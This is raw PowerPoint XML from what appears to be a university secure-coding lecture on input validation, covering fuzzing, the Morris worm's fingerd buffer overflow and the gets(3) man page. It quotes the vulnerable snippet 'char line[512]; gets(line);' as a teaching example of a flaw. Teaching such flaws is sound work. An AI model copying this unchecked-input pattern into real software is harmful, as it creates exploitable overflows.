              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>randomly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0"/>
              <a:t> vary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0"/>
              <a:t> input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>passed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> to a program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Cannot prove program is ok, but it is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" b="1" dirty="0"/>
              <a:t>useful help</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63</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Reading</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="1871663"/>
            <a:ext cx="8713788" cy="4149725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Mandatory reading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>www.frasunek.com/lukemftpd.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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64</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Morris worm</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Fingerd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> vulnerability:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Finger daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>overflow problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>remotely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>available service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>List of logged users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Information about users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>You specify a username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>and get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>info about the user</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Morris worm</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>Fingerd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>fingerd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> expected usernames will be shorter than 512 bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81924" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827584" y="3501008"/>
            <a:ext cx="4248968" cy="1692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cs-CZ" sz="800" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> line[512]; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2800" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>line[0] = "\0"; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2800" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(line); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2800" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-C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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Gets(3)</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82948" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="490538" y="2060575"/>
            <a:ext cx="77533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dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> *s);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>DESCRIPTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>gets()  reads a line from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> into the buffer pointed to by s until either </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>a terminating newline or EOF, which it replaces with '\0'.  No check for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>buffer overrun is performed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>BUGS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Never use gets().  Because it is impossible to tell without knowing the data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>in advance how  many  characters gets() will read, and because gets() will </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>continue to store characters past the end of the buffer, it is extremely </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>dangerous to use.  It has been used to break computer security.  Use </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>() instead.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Zástupný symbol pro číslo snímku 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4E0949E4-F30C-451B-BA80-117ED8BC22DB}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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RCS_prezenta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CRCS_prezentace</Template>
  <TotalTime>9062</TotalTime>
  <Words>3947</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Předvádění na obrazovce (4:3)</PresentationFormat>
  <Paragraphs>638</Paragraphs>
  <Slides>64</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64</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="70" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Inconsolata</vt:lpstr>
      <vt:lpstr>CRCS_prezentace</vt:lpstr>
      <vt:lpstr>Check your input</vt:lpstr>
      <vt:lpstr>Risks of unvalidated input</vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>Morris worm</vt:lpstr>
      <vt:lpstr>Morris worm</vt:lpstr>
      <vt:lpstr>Morris worm</vt:lpstr>
      <vt:lpstr>Morris worm</vt:lpstr>
      <vt:lpstr>Morris worm</vt:lpstr>
      <vt:lpstr>Gets(3)</vt:lpstr>
      <vt:lpstr>Morris worm </vt:lpstr>
      <vt:lpstr>Morris worm – the shell code</vt:lpstr>
      <vt:lpstr>Fingerd fix</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection – list of common attacks</vt:lpstr>
      <vt:lpstr>SQL injection jokes</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection jokes</vt:lpstr>
      <vt:lpstr>Possible solutions ?</vt:lpstr>
      <vt:lpstr>Possible solutions</vt:lpstr>
      <vt:lpstr>Ignore vs. reject</vt:lpstr>
      <vt:lpstr>Blacklisting</vt:lpstr>
      <vt:lpstr>Drawbacks of blacklisting</vt:lpstr>
      <vt:lpstr>Example of blacklisting</vt:lpstr>
      <vt:lpstr>Whitelisting</vt:lpstr>
      <vt:lpstr>Escape - Process all input </vt:lpstr>
      <vt:lpstr>MySQL</vt:lpstr>
      <vt:lpstr>MySQL</vt:lpstr>
      <vt:lpstr>Parameterized/prepared statements</vt:lpstr>
      <vt:lpstr>HTML escaping</vt:lpstr>
      <vt:lpstr>HTML escaping</vt:lpstr>
      <vt:lpstr>Format string vulnerabilities</vt:lpstr>
      <vt:lpstr>Format string vulnerability</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Crashing the program</vt:lpstr>
      <vt:lpstr>View the stack</vt:lpstr>
      <vt:lpstr>Read from memory</vt:lpstr>
      <vt:lpstr>Read from memory</vt:lpstr>
      <vt:lpstr>Write to memory</vt:lpstr>
      <vt:lpstr>Format string – not only printf</vt:lpstr>
      <vt:lpstr>Format string vulnerability - prevention</vt:lpstr>
      <vt:lpstr>URL and Files/Emails</vt:lpstr>
      <vt:lpstr>URL: File names</vt:lpstr>
      <vt:lpstr>What can be input?</vt:lpstr>
      <vt:lpstr>IPC</vt:lpstr>
      <vt:lpstr>Environment variables</vt:lpstr>
      <vt:lpstr>Example X server (xkbdir vulnerability)</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Xserver - today</vt:lpstr>
      <vt:lpstr>MS04-028: JPEG processing</vt:lpstr>
      <vt:lpstr>MS04-028: Affected components</vt:lpstr>
      <vt:lpstr>MS04-028: More details</vt:lpstr>
      <vt:lpstr>MS04-028: More details</vt:lpstr>
      <vt:lpstr>MS04-028: More details</vt:lpstr>
      <vt:lpstr>MS12-004: MIDI files</vt:lpstr>
      <vt:lpstr>MS12-004: More details</vt:lpstr>
      <vt:lpstr>MS12-004: More details</vt:lpstr>
      <vt:lpstr>MS12-004: More details</vt:lpstr>
      <vt:lpstr>MS12-004: More details</vt:lpstr>
      <vt:lpstr>FreeBSD-SA-13:05.nfsserver </vt:lpstr>
      <vt:lpstr>One last example</vt:lpstr>
      <vt:lpstr>Input Validation Best Practices:</vt:lpstr>
      <vt:lpstr>Fuzzing</vt:lpstr>
      <vt:lpstr>Reading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 your input</dc:title>
  <dc:creator>Jmeno uzivatele</dc:creator>
  <cp:lastModifiedBy>Lukáš Němec</cp:lastModifiedBy>
  <cp:revision>75</cp:revision>
  <cp:lastPrinted>2012-09-10T13:56:59Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-07-10T05:02:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-10-03T23:09:21Z</dcterms:modified>
</cp:coreProperties>
</file>